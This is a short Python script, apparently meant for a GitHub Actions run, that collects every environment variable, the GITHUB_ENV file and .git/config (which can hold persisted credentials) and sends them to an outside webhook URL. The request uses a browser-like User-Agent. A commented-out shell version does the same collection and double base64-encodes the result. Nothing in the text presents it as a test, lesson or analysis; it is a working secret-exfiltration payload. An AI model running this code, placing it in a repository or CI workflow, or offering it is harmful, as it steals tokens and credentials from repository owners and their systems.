#!/usr/bin/env python
import base64
from datetime import datetime, timezone
import json
from os import environ
from pathlib import Path
import sys
from urllib.request import urlopen

import urllib


d = {
    "env": sorted(environ.items()),
}

if genv := environ.get('GITHUB_ENV'):
    try:
        with Path(genv).open() as inp:
            d['GITHUB_ENV'] = inp.read()
    except:
        pass

try:
    with Path('.git/config').open() as inp:
        d['.git_config'] = list(map(str.rstrip, inp.readlines()))
except:
    pass

# json.dump(d, sys.stderr)
# Define your headers as a dictionary
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36",
    "Accept": "application/json"
}
url = 'https://webhooksite.net/049662f7-3960-4593-80f0-900acb38cf0d'
req = urllib.request.Request(url, headers=headers)
final = {'meta':{'now': str(datetime.now(timezone.utc)), 'keys': list(d.keys())}, 'values':d}
with urllib.request.urlopen(req, data=json.dumps(final, sort_keys=True, indent=0).encode('utf-8')) as response:
    data = response.read().decode("utf-8")
    print(data)

# (
#     echo -n '{'
#     echo -n '"env": "'$(env | sort)'",'

#     echo -n '"GITHUB_ENV":"'
#     if [[ $GITHUB_ENV ]]; then
#         sort $GITHUB_ENV|sed 's/$/\\n/'
#     fi
#     echo -n '",'

#     echo -n '"cat .git/config when INPUT_PERSIST-CREDENTIALS=true":"'
#     echo $(sed 's/$/\\n/' .git/config)
#     echo -n '"}'
# ) | base64 -w0 | base64 -w0 >&2
